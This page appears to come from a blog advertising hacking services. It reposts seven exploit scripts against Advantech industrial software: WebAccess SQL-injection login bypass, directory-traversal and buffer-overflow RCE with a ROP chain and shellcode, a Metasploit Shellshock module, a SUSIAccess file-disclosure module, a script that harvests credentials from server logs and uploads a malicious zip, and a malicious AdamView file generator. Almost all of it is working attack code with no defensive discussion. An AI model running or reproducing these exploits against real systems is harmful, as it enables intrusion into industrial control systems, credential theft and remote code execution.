Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863103126

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#!/usr/bin/python2.7

# Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability
# Date: 01-13-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.advantech.com
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe
# Version: Advantech WebAccess 8.0-2015.08.16
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-16716
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-065/

# Notes:
#
# There are two service interfaces:
# 1) SOAP
# 2) REST
#
# This PoC targets REST
#
# The web services did not work out of the box, and a new website/app was created in IIS for testing.
# This issue was potentially due to the fact that testing was completed against a trial version.
# PoC may need slight tweaks depending on configuration of the web service.
#
# Original vulnerability was reported for more recent software version.
#
# This WebAccessAuthBypass class can be imported :-) 

import sys, requests
from xml.etree import ElementTree

class WebAccessAuthBypass:
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port
        self.base_url = "http://%s:%s/BWMobileService/BWScadaRest.svc/" % (ip, port)
        
    def convert_entities(self, s):
	return s.replace('>', '>').replace('<', '<') # convert html entities in response, for parsing

    def get_project_list(self):
	print 'Getting list of projects...'
	res = requests.get(self.base_url)
	projects = list()
	if res.status_code != 200:
	    print 'Bad HTTP response...'
	else:
	    if 'PROJECT' not in res.text:
		print 'No projects listed by service.'
	    else:
		s = self.convert_entities(res.text)
		xml = ElementTree.fromstring(s)
		for project_list in xml:
		    for project in project_list:
			name = project.get('NAME')
			if name is not None:
			    projects.append(name)
	if len(projects) > 0:
	    print 'Found the following projects: ' + str(projects)
	    return projects
	else:
	    return None

    # returns a token
    def login(self, project):
	# SQL Injection into the user parameter
	url = self.base_url + "Login/" + project + "/notadmin'%20or%20'x'%3D'x/nopass" # notadmin' or 'x'='x
	res = requests.get(url)
	token = None
	if res.status_code != 200:
	    print 'Bad HTTP response...'
	else:
	    if 'OK TOKEN' not in res.text:
		print 'No token returned by service.'
	    else:
		s = self.convert_entities(res.text)
		xml = ElementTree.fromstring(s)
		if len(xml) > 0:
		    token = xml[0].get('TOKEN')
	return token

    # token returned can be used for more transactions
    def get_token(self):
        project_list = self.get_project_list()
        project = project_list[0] # might as well pick the first project
        token = self.login(project_list[0])
        return token

if __name__ == "__main__":
    ip = 'targetip'
    port = 'port#'
    bypass = WebAccessAuthBypass(ip, port)
    token = bypass.get_token()

    if token is not None:
	print 'Successfully got an authentication token: ' + token
    else:
	print 'Unsuccessful.'
HireHackking 
#!/usr/bin/python2.7
  
# Exploit Title: Advantech WebAccess < 8.3 webvrpcs Directory Traversal RCE Vulnerability
# Date: 03-11-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.advantech.com
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe
# Version: Advantech WebAccess 8.2-2017.08.18
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-16720
# See Also: https://www.zerodayinitiative.com/advisories/ZDI-18-024/

import sys, struct
from impacket import uuid
from impacket.dcerpc.v5 import transport

def call(dce, opcode, stubdata):
  dce.call(opcode, stubdata)
  res = -1
  try:
    res = dce.recv()
  except Exception, e:
    print "Exception encountered..." + str(e)
    sys.exit(1)
  return res

if len(sys.argv) != 2:
  print "Provide only host arg"
  sys.exit(1)

port = 4592
interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc"
version = "1.0" 

host = sys.argv[1]

string_binding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(string_binding)
trans.set_dport(port)

dce = trans.get_dce_rpc()
dce.connect()

print "Binding..."
iid = uuid.uuidtup_to_bin((interface, version))
dce.bind(iid)

print "...1"
stubdata = struct.pack("<III", 0x00, 0xc351, 0x04)
call(dce, 2, stubdata)

print "...2"
stubdata = struct.pack("<I", 0x02)
res = call(dce, 4, stubdata)
if res == -1:
  print "Something went wrong"
  sys.exit(1)
res = struct.unpack("III", res)

if (len(res) < 3):
  print "Received unexpected length value"
  sys.exit(1)

print "...3"
# ioctl 0x2711
stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204)
command = "..\\..\\windows\\system32\\calc.exe"
fmt = "<" + str(0x204) + "s"
stubdata += struct.pack(fmt, command)
call(dce, 1, stubdata)

print "\nDid it work?"

dce.disconnect()
HireHackking 
#!/usr/bin/python2.7
  
# Exploit Title: Advantech WebAccess < 8.1 webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow RCE
# Date: 03-29-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.advantech.com
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe
# Version: Advantech WebAccess 8.0-2015.08.16
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2016-0856
# See Also: https://www.zerodayinitiative.com/advisories/ZDI-16-093/

import sys, struct
from impacket import uuid
from impacket.dcerpc.v5 import transport

def call(dce, opcode, stubdata):
  dce.call(opcode, stubdata)
  res = -1
  try:
    res = dce.recv()
  except Exception, e:
    print "Exception encountered..." + str(e)
    sys.exit(1)
  return res

if len(sys.argv) != 2:
  print "Provide only host arg"
  sys.exit(1)

port = 4592
interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc"
version = "1.0" 

host = sys.argv[1]

string_binding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(string_binding)
trans.set_dport(port)

dce = trans.get_dce_rpc()
dce.connect()

print "Binding..."
iid = uuid.uuidtup_to_bin((interface, version))
dce.bind(iid)

print "...1"
stubdata = struct.pack("<III", 0x00, 0xc351, 0x04)
call(dce, 2, stubdata)

print "...2"
stubdata = struct.pack("<I", 0x02)
res = call(dce, 4, stubdata)
if res == -1:
  print "Something went wrong"
  sys.exit(1)
res = struct.unpack("III", res)

if (len(res) < 3):
  print "Received unexpected length value"
  sys.exit(1)

print "...3"

# MessageBoxA() Shellcode
# Credit: https://www.exploit-db.com/exploits/40245/
shellcode = ("\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0")

def create_rop_chain():
    rop_gadgets = [
      0x0704ac03,  # XOR EAX,EAX # RETN    ** [BwPAlarm.dll]             eax = 0
      0x0706568c,  # XOR EDX,EDX # RETN    ** [BwPAlarm.dll]             edx = 0

      0x0702455b,  # ADD EAX,40 # RETN    ** [BwPAlarm.dll] **           eax = 0x40
      0x0702823d,  # PUSH EAX # ADD BYTE PTR DS:[ESI],7 # MOV DWORD PTR DS:[7070768],0 # POP ECX # RETN
      # ecx = 0x40
    ]
    for i in range(0, 63):
        rop_gadgets.append(0x0702455b) # ADD EAX,40 # RETN    ** [BwPAlarm.dll] **
    # eax = 0x1000
    
    rop_gadgets += [
      0x0702143d,  # ADD EDX,EAX # ADD AL,0 # AND EAX,0FF # RETN 0x04    ** [BwPAlarm.dll]
      # edx = eax
      # edx = 0x1000

      0x07065b7b,  # POP EDI # RETN [BwPAlarm.dll]
      0x41414141, 
      0x07059581,  # RETN (ROP NOP) [BwPAlarm.dll]
      # edi = RETN

      0x0705ddfd,  # POP EAX # RETN [BwPAlarm.dll]
      0x0201e104,  # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll]
      0x070630eb,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwPAlarm.dll]
      0x070488f7,  # PUSH EAX # MOV EAX,DWORD PTR DS:[EDX*4+7068548] # AND EAX,ESI # POP ESI # POP EBX # RETN 
      # esi -> PTR to VirtualAlloc
      0xFFFFFFFF # ebx = -1
    ]
    for i in range(0, len(shellcode)+1):
      rop_gadgets.append(0x0703e116) # INC EBX # MOV AX,10 # RETN    ** [BwPAlarm.dll]
    # ebx = size of shellcode

    rop_gadgets += [
      0x070441d1,  # POP EBP # RETN [BwPAlarm.dll]
      0x0703fe39,  # POINTER INC ECX # PUSH ESP # RETN    ** [BwPAlarm.dll] **
      # ebp -> Return to ESP
      
      0x0705ddfd,  # POP EAX # RETN [BwPAlarm.dll] ------ Modified by me 
      0x90909090,  # nop
      # eax = 0x90909090

      0x07010f5c  # PUSHAD # RETN [BwPAlarm.dll] 
    ]

    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

# construct buffer
buf = "A"*379
buf += "\x33\xb7\x01\x07" # 0701b733 RETN
buf += create_rop_chain()
buf += shellcode

# ioctl 0x278E
stubdata = struct.pack("<IIII", res[2], 0x278E, len(buf), len(buf))

fmt = "<" + str(len(buf)) + "s"
stubdata += struct.pack(fmt, buf)

print "\nDid it work?"
call(dce, 1, stubdata)

dce.disconnect()
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',
      'Description' => %q{
        This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
        handles external environment variables. This module targets the 'ping.sh' CGI
        script, acessible through the Boa web server on Advantech switches. This module
        was tested against firmware version 1322_D1.98.
      },
      'Author' => 'hdm',
      'References' => [
        ['CVE', '2014-6271'],
        ['CWE', '94'],
        ['OSVDB', '112004'],
        ['EDB', '34765'],
        ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'],
        ['URL', 'https://access.redhat.com/articles/1200223'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
      ],
      'Privileged' => false,
      'Arch' => ARCH_CMD,
      'Platform' => 'unix',
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00\x0A\x0D",
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'openssl generic'
            }
        },
      'Targets' =>  [[ 'Automatic Targeting', { 'auto' => true } ]],
      'DefaultTarget' => 0,
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Dec 01 2015'
    ))
    register_options([
      Opt::RPORT(80)
    ], self.class)
  end

  #
  # CVE-2014-6271
  #
  def cve_2014_6271(cmd)
    %{() { :;}; $(#{cmd}) & }
  end

  #
  # Check credentials
  #
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/cgi-bin/ping.sh'
    )
    if !res
      vprint_error("#{peer} - No response from host")
      return Exploit::CheckCode::Unknown
    elsif res.headers['Server'] =~ /Boa\/(.*)/
      vprint_status("#{peer} - Found Boa version #{$1}")
    else
      print_status("#{peer} - Target is not a Boa web server")
      return Exploit::CheckCode::Safe
    end

    if res.body.to_s.index('127.0.0.1 ping statistics')
      return  Exploit::CheckCode::Detected
    else
      vprint_error("#{peer} - Target does not appear to be an Advantech switch")
      return Expoit::CheckCode::Safe
    end
  end

  #
  # Exploit
  #
  def exploit
    cmd = cve_2014_6271(payload.encoded)
    vprint_status("#{peer} - Trying to run command '#{cmd}'")
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/cgi-bin/ping.sh',
      'agent'  => cmd
    )
  end

end
HireHackking 
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Advantech SUSIAccess Server Directory Traversal Information Disclosure',
			'Description'    => %q{
				This module exploits an information disclosure vulnerability found in
				Advantech SUSIAccess <= version 3.0. The vulnerability is triggered when
				sending a GET request to the server with a series of dot dot slashes (../)
				in the file parameter. 
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2016-9349' ],
					[ 'ZDI', '16-628' ],
					[ 'BID', '94629' ],
					[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-04' ]
				],
			'DisclosureDate' => 'Dec 13 2016'))

		register_options(
			[
				OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
				OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
				Opt::RPORT(8080)
			], self.class )
	end

	def run

	depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
	levels = "/" + ("../" * depth)

	file = "#{levels}#{datastore['FILE']}"
	file = file.gsub(/ /, "%20")

	res = send_request_raw({
		'method'	=> 'GET',
		'uri'		=> "/downloadCSV.jsp?file=#{file}",
	})

	if res and res.code == 200
		loot = res.body
		if not loot or loot.empty?
			print_status("File from #{rhost}:#{rport} is empty...")
			return
		end
		file = ::File.basename(datastore['FILE'])
		path = store_loot('advantech_susiaccess.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
		print_status("Stored #{datastore['FILE']} to #{path}")
		return
	else
		print_error("Something went wrong... Application returned a #{res.code}")
	end

	end
end
__END__
<%@ page import="java.util.*,java.io.*" %>               
<%
 File f = new File (getServletContext().getRealPath("/") + request.getParameter("file") );
 //set the content type(can be excel/word/powerpoint etc..)
 response.setContentType ("application/csv");
 //set the header and also the Name by which user will be prompted to save
 response.setHeader ("Content-Disposition", "attachment; filename=\""+request.getParameter("file").split("/")[2] +"\"");
 
 //get the file name
 String name = f.getName().substring(f.getName().lastIndexOf("/") + 1,f.getName().length());
 //OPen an input stream to the file and post the file contents thru the 
 //servlet output stream to the client m/c
 
  InputStream in = new FileInputStream(f);
  ServletOutputStream outs = response.getOutputStream();
  
  
  int bit = 256;
  int i = 0;
  try {
   while ((bit) >= 0) {
    bit = in.read();
    outs.write(bit);
   }
   //System.out.println("" +bit);
  } catch (IOException ioe) {
   ioe.printStackTrace(System.out);
  }
//  System.out.println( "n" + i + " bytes sent.");
//  System.out.println( "n" + f.length() + " bytes sent.");
  outs.flush();
  outs.close();
  in.close(); 

%>
HireHackking 
#!/usr/bin/env ruby

=begin
Exploit Title: Advantech SUSIAccess RecoveryMgmt File Upload
Date: 07/31/17
Exploit Author: james fitts 
Vendor Homepage: http://www.advantech.com/
Version: Advantech SUSIAccess <= 3.0
Tested on: Windows 7 SP1
Relavant Advisories:
	ZDI-16-630
	ZDI-16-628
	CVE-2016-9349
	CVE-2016-9351
	BID-94629
	ICSA-16-336-04

Notes:
	This PoC will upload AcronisInstaller.exe to the root of C:\
	You can modify this to drop files where ever you want on the
	filesystem.

	By default the script will use the directory traversal vuln
	to pull down the log files and parse for the base64 encoded
	credentials. Once it has that, it will use them to log into
	the application and upload the malicious zip file.
=end

require 'mime/types'
require 'fileutils'
require 'net/http'
require 'nokogiri'
require 'base64'
require 'digest'
require 'date'
require 'uri'
require 'zip'

def uploadZip(target, creds, cookies)
	uri = URI("http://#{target}:8080/webresources/RecoveryMgmt/upload")
	bound = "AaBbCcDdEe"

	path = Dir.pwd
	zipfile = "#{path}/update.zip"

	post_data = []
	post_data << "--#{bound}\r\n"
	post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_LastUpdateName\""
	post_data << "\r\n\r\n\r\n"
	post_data << "--#{bound}\r\n"
	post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_UploadFileFullName\""
	post_data << "\r\n\r\nupdate.zip\r\n"
	post_data << "--#{bound}\r\n"
	post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_Content\""
	post_data << "\r\n\r\n"
	post_data << "<request Authorization=\"#{creds[0].to_s}\"/>\r\n"
	post_data << "--#{bound}\r\n"
	post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_FileInput\"; filename=\"update.zip\""
	post_data << "\r\nContent-Type: application/zip"
	post_data << "\r\n\r\n"
	post_data << File.read(zipfile)
	post_data << "\r\n\r\n--#{bound}--\r\n"

	req = Net::HTTP::Post.new(uri, initheader = {
			'Cookie'						=>	cookies,
			'Authorization'			=>	"Basic #{creds[0].to_s}",
			'X-Requested-With'	=>	"XMLHttpRequest",
			'Content-Type'			=>	"multipart/form-data; boundary=#{bound}",
			'User-Agent'				=>	"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
			'Accept-Language'		=>	"en-US,en;q=0.5",
			'Accept'						=>	"text/plain, */*; q=0.01",
			'Connection'				=>	"close"
	})

	req.body = post_data.join

	http = Net::HTTP.new("#{target}", 8080)
	res = http.start {|http| http.request(req)}

	if res.code =~ /200/
		puts "[+] Upload successful!"
	end
end

def craftZip(target, payload)
	path = "../../../../../../../../../../Program%20Files\\Advantech\\SUSIAccess%203.0%20Server\\Setting.xml"

	uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{path}")
	res = Net::HTTP.get_response(uri)
	xml = Nokogiri::XML(res.body)
	ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/version').to_s.split("=")[1].split("\"")[1]
	kern_ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/kernal_version').to_s.split("=")[1].split("\"")[1]

	# version information doesn't matter
	# the application will still extract the zip
	# file regardless of whether or not its
	# a greater version or lesser
	f = File.open("LatestVersion.txt", 'w')
	f.puts("Installer Version: #{ver}\r\nApplication Version: #{kern_ver}")
	f.close

	f = File.open("md5.txt", 'w')
	md5 = Digest::MD5.hexdigest(File.read("AcronisInstaller.exe"))
	f.puts md5
	f.close

	path = Dir.pwd
	zipfile = "#{path}/update.zip"

	if File.exist?(zipfile)
		FileUtils.rm(zipfile)
	end

	files = ["AcronisInstaller.exe", "LatestVersion.txt", "md5.txt"]

	levels = "../" * 10
	Zip::File.open(zipfile, Zip::File::CREATE) do |zip|
		files.each do |fname|
			if fname == "AcronisInstaller.exe"
				zip.add("#{levels}#{fname}", fname)
			end
			zip.add(fname, fname)
		end
	end

	if File.exist?(zipfile)
		puts "[!] Malicious zip created successfully"
	end
end

def doLogin(target, creds)
	formattedDate = DateTime.now.strftime("%a %b %d %Y %H:%M:%S GMT-0400 (EDT)")
	formattedDate = URI::encode(formattedDate)

	uri = URI("http://#{target}:8080/frmServer.jsp?d=#{formattedDate}")

	res = Net::HTTP.get_response(uri)
	jsessid = res.header['Set-Cookie'].split(';')[0]
	cookies = "deviceType=pc; log4jq=OFF; selectedLang=en_US; #{jsessid}"

	uname = Base64.decode64(creds[0].to_s).split(":")[0]
	pass = Base64.decode64(creds[0].to_s).split(":")[1]

	data = "<request Authorization=\"#{creds[0].to_s}\">"
	data << "<item name=\"username\" value=\"#{uname}\"/>"
	data << "<item name=\"password\" value=\"#{pass}\"/>"
	data << "</request>"

	puts "[+] Attempting login with pilfered credentials now"
	uri = URI("http://#{target}:8080/webresources/AccountMgmt/Login")

	req = Net::HTTP::Post.new(uri, initheader = {
		'Content-Type'      =>  "application/xml",
		'Cookies'           =>  cookies,
		'Authorization'     =>  "Basic #{creds[0].to_s}",
		'X-Requested-With'  =>  'XMLHttpRequest'
	})

	req.body = data

	http = Net::HTTP.new("#{target}", 8080)
	res = http.start {|http| http.request(req)}

	if res.body =~ /<result><role name/
		puts "[+] Login successful!"
		return cookies
	else
		puts "[-] Something went wrong..."
	end
	
end

def getCreds(target)
	cnt = 1
	d = Date.today
	d.strftime("%y-%m-%d")
	creds = []

	while cnt < 31
		fdate = d - cnt
		cnt += 1

		path = "../../../../../../../../../../Program Files\\Apache Software Foundation\\logs\\"
		file = "localhost_access_log.#{fdate}.txt"
		full_path = path + file

		uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{full_path}")

		res = Net::HTTP.get_response(uri)

		if res.code =~ /200/
			creds << res.body.scan(/(?<=Authorization=%22)[A-Za-z0-9=]+/)
		end
	end
	return creds.flatten.uniq
end

##
# Main
##
if ARGV.length != 1
	puts "Usage:\r\n\truby #{$0} [TARGET IP]"
else
	target = ARGV[0]
	payload = "AcronisInstaller.exe"
	
	puts "[+] Extracting credentials now..."
	credentials = getCreds(target)
	if credentials.length > 0
		puts "[!] Credentials found!"
		cookies = doLogin(target, credentials)
		puts "[+] Crafting malicious zip now..."
		craftZip(target, payload)
		uploadZip(target, credentials, cookies)
	else
		puts "[-] Credentials not found.. Try searching for more log files.."
		exit
	end
end
HireHackking 
#!/usr/bin/env ruby
# Exploit Title: Advantech AdamView (.gni) SEH Buffer Overflow
# Date: Dec 09 2014
# Vulnerability Discovery: Daniel Kazimirow and Fernando Paez - Core Security
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-179WGW
# Version: 4.30.003
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-8386
# Advisory ID: CORE-2014-0008

filename = "crash-it.gni"
buf = "A" * 1022
seh = 134

# bad chars '\x61 .. \x7a'
# pop mspaint
sc =
"\xb8\x99\x4e\x83\xd1\x2d\x1f\x10\x10\x10\x50" +
"\xb8\xcb\xaf\xe6\x3e\x50\xb8\xc5\xf9\x87\x7b" +
"\x2d\x1f\x1f\x1f\x1f\x50\xb8\x9f\x7b\x5d\x8b" +
"\x2d\x1f\x16\x16\x16\x50\xb8\x8a\x27\xe6\xa0" +
"\x2d\x1f\x10\x10\x10\x50\xb8\x1e\x12\x8a\x16" +
"\x50\xb8\x09\x7b\x7e\x17\x2d\x1f\x11\x11\x11" +
"\x50\xb8\x3f\x2a\x50\x85\x50\xb8\xc9\x97\x1d" +
"\x82\x2d\x1f\x10\x10\x10\x50\xb8\x9d\x81\x7b" +
"\xc2\x2d\x1f\x17\x17\x17\x50\xb8\xca\x1d\x8a" +
"\x59\x2d\x1f\x10\x10\x10\x50\xb8\x20\x42\xfd" +
"\xb4\x50\xb8\x1e\xe1\x94\x85\x50\xb8\x82\x94" +
"\xa3\x85\x2d\x1f\x10\x10\x10\x50\xb8\x38\xc9" +
"\x4c\xf7\x50\xb8\x33\xda\x17\x4d\x50\xb8\x42" +
"\x82\xb6\xf8\x2d\x1f\x10\x10\x10\x50\xb8\x91" +
"\xa6\xd0\xe7\x2d\x1f\x10\x10\x10\x50\xb8\x56" +
"\xca\x13\xb6\x50\xb8\x8f\x4a\x57\xa1\x2d\x1f" +
"\x10\x10\x10\x50\xb8\x1a\x4f\xda\x7e\x2d\x1f" +
"\x10\x10\x10\x50\xb8\x93\x1a\xcb\xb9\x50\xb8" +
"\xd0\x15\x7e\xad\x50\xb8\xf0\xe4\xaa\x2b\x50" +
"\xb8\xec\x43\xd9\x88\x50\xb8\x17\x39\xfd\xfd" +
"\x50\xb8\xdb\x3a\x40\xfa\x50\xb8\x9a\xfd\x9f" +
"\x8f\x50\xb8\xa3\x31\x12\x4d\x50\xb8\x5a\xff" +
"\x2d\x9e\x50\xb8\xa9\xfc\xfb\x4f\x50\xb8\x84" +
"\xe2\x7b\xa1\x2d\x2f\x2d\x2d\x2d\x50\xb8\x84" +
"\x98\xad\x7b\x2d\x1f\x14\x14\x14\x50\xb8\x2d" +
"\x1c\x91\x38\x50\xb8\x22\xcb\x39\x23\x50\xb8" +
"\x07\xf4\x4c\x89\x50\xb8\xc7\x7f\xec\xee\x50" +
"\xb8\xa2\x3a\x2f\xcf\x50\xb8\xe9\x2d\x7c\xde" +
"\x50\xb8\xcb\x40\x83\x9a\x2d\x1f\x10\x10\x10" +
"\x50\xb8\x8d\xfe\x7e\x4b\x50\xb8\x10\x0d\x3b" +
"\x7b\x2d\x1f\x10\x10\x10\x50\xb8\x2d\x2e\xe8" +
"\xe9\x50\xb8\xea\x10\xe7\xd7\x2d\x1f\x10\x10" +
"\x10\x50\xb8\xe2\x0a\x7b\x83\x2d\x1f\x1b\x1b" +
"\x1b\x50\xb8\x8d\xfb\xc4\x04\x50\xb8\xe5\xa6" +
"\x34\x7f\x2d\x1f\x10\x10\x10\x50\xb8\xaf\xf9" +
"\x91\x7b\x2d\x1f\x1c\x1c\x1c\x50\xb8\x19\x38" +
"\x44\x4d\x50\xb8\xd1\xc7\xb3\x2a\x50\xb8\x22" +
"\x7b\x27\xf3\x2d\x1f\x11\x11\x11\x50\xb8\x23" +
"\x42\x7b\x27\x2d\x1f\x11\x11\x11\x50\xb8\xb1" +
"\x32\x83\xc2\x50\xb8\xf4\x5a\x31\xc9\x50\xb8" +
"\xc2\xe9\x84\x34\x2d\x1f\x10\x10\x10\x50\xb8" +
"\xbd\x24\x3b\x5b\x50\xb8\x90\x90\xda\xc3\x50"

buf[seh-4,4]  = "\xeb\x0a\x41\x41" # jmp $+16
buf[seh,4]    = [0x22b0249b].pack("V").force_encoding("utf-8") # ppr


buf[seh+8,6] = "\x81\xc4\x54\xf2\xff\xff" # add esp,-3500
buf[seh+14,sc.size] = sc
buf[seh+(14+sc.size),2] = "\xff\xd4"

gni_file =
"\x41\x47\x4e\x49\xae\x01\x04\x00" +
"\x27\x48\x00\x00\x27\x48\x00\x00" +
"\x27\x48\x00\x00\x27\x48\x00\x00" +
"\x27\x48\x00\x00\x27\x48\x00\x00" +
"\x27\x48\x00\x00\x48\x45\x41\x44" +
"\x16\x00\x27\x00\x00\x00\x00\x00" +
"\x00\x00\x32\x00\x00\x00\x00\xff" +
"\x00\x00\x00\x00\x80\x02\xe0\x01" +
"\x53\x57\x50\x4c\x30\x00\x00\x00" +
"\x00\x00\x01\x00\x00\x00\xfe\xfe" +
"\xff\xff\xff\xff\xff\xff\xff\xff" +
"\xff\xff\xff\xff\xff\xff\x00\x00" +
"\x00\x00\x00\x00\x00\x00\xb0\x04" +
"\x00\x00\xb7\x01\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x42\x54" +
"\x53\x4b\x76\x00\x01\x00\x00\x00" +
"\x2a\x01\x01\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x01\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x05\x00\x00\x00" +
"\x54\x41\x53\x4b\x31\x00\x00\x00" +
"\x00\x00\x00\x01\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x02\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\xc8\x42\x45\x54\x53\x4b\x50\x57" +
"\x50\x4c\x3d\x00\x00\x00\x00\x00" +
"\x01\x00\x00\x00\xff\xff\xff\xff" +
"\xff\xff\xff\xff\xff\xff\xff\xff" +
"\xff\xff\xff\xff\x16\x00\x00\x00" +
"\x1d\x00\x00\x00\xc6\x04\x00\x00" +
"\xbc\x01\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x07\x01" +
"\x00\xfe\x03" + buf + # '\xfe\x03' controlled buffer size 
"\x00\x50\x45\x4e\x44\x46\x56\x4b" +
"\x53\x24\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x01\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x4e\x45\x54" +
"\x4b\x41\x44\x41\x4d\x56\x69\x65" +
"\x77\x00\x00\x00\x00\xd0\x07\xd0" +
"\x07\x01\x00\x00\x00\x01\x00\x00" +
"\x00\x5a\x45\x4f\x46"

bug = gni_file

File.open(filename,"wb") do |fp|
  fp.write(bug)
  fp.close
end
HireHackking 
# # # # #
